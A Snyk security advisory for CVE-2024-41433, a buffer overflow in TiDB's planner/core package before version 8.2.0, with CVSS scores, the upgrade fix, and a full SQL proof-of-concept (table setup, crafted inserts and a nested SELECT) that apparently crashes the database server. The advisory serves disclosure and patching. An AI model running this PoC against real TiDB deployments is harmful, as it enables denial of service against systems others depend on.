Homepage
About Snyk

Buffer Overflow Affecting github.com/pingcap/tidb/pkg/planner/core package, versions <8.2.0

Severity

 Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Proof of concept
    EPSS
    0.04% (11th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-GOLANG-GITHUBCOMPINGCAPTIDBPKGPLANNERCORE-7888177
  • published 4 Sep 2024
  • disclosed 3 Sep 2024
  • credit r33s3n6
Report a new vulnerability Found a mistake?

Introduced: 3 Sep 2024

CVE-2024-41433 Open this link in a new tab
CWE-120 Open this link in a new tab

How to fix?

Upgrade github.com/pingcap/tidb/pkg/planner/core to version 8.2.0 or higher.

Overview

Affected versions of this package are vulnerable to Buffer Overflow via the component expression.ExplainExpressionList. An attacker can disrupt service by sending specially crafted input.

PoC 

create table t_ldpj7bp ( 
c_w_jr14qm2 int ,
c_t3nd927 int ,
c_ts int ,
c_s text ,
c_qchmg double ,
c_r int ,
c_olb3fsg6 text ,
c_zkbe tinyint ,
primary key(c_w_jr14qm2) NONCLUSTERED) shard_row_id_bits=8 pre_split_regions=5;

-- sql #267
alter table t_ldpj7bp set tiflash replica 1;

insert into t_ldpj7bp (c_w_jr14qm2, c_t3nd927, c_ts, c_s, c_qchmg, c_r, c_olb3fsg6, c_zkbe) values 
  (730552758, -682774206, 1698439632, 'lrvil359', 18446744073709551616.5, cast(cast(null as signed) as signed), 'oj1', (-1367510804 in (
    2123597870, 1485484027))), 
  (-1001332962, -1396443960, cast(cast(null as signed) as signed), 'e43lh', 15.54, -1568307927, 'i', (-1162033997 not in (
    -1850570375, -781179836, -1281662147, -431391092, cast(null as signed)))), 
  (-727295464, 1998529670, -1873237194, 'lps56o', 70.81, 1380690610, cast(null as char), ((NOT NOT(cast( (cast(cast(null as signed) as signed) && cast(2536017375093623800 as signed)) as unsigned)))) 
    and ((NOT NOT(cast( (cast(2051320819 as signed) <=> cast(-8632453786780487783 as signed)) as unsigned))))), 
  (2133408768, 736339957, -1486317339, 'f', 62.97, -1444096406, 'tj', (NOT NOT(cast( (cast(cast(null as char) as char) = cast(cast(null as char) as char)) as unsigned))));

-- [[NOTE]] please wait a while before executing the following sql, otherwise the bug may not be triggered.
SELECT
  ref_0.c_t3nd927 as c2
FROM
  t_ldpj7bp as ref_0
WHERE
  (EXISTS (
  select distinct 
      cast(cast(null as signed) as signed) as c0
    from 
      (select  
            ref_1.c_w_jr14qm2 as c0, 
            ref_1.c_ts as c1
          from 
            t_ldpj7bp as ref_1
          where (NOT NOT(cast( (cast(2147483648.100000 as double) || cast(78.5 as double)) as unsigned)))) as subq_0
    where (NOT NOT(cast( (cast(ref_0.c_t3nd927 as signed) <> cast(-2308981195293685378 as signed)) as unsigned)))
    order by c0 desc))
ORDER BY
  c2 ASC
LIMIT 55;

CVSS Scores

version 4.0
version 3.1
Expand this section

Snyk

Recommended
6.9 medium
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Attack Requirements (AT)
    None
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Confidentiality (VC)
    Low
  • Integrity (VI)
    Low
  • Availability (VA)
    Low
  • Confidentiality (SC)
    None
  • Integrity (SI)
    None
  • Availability (SA)
    None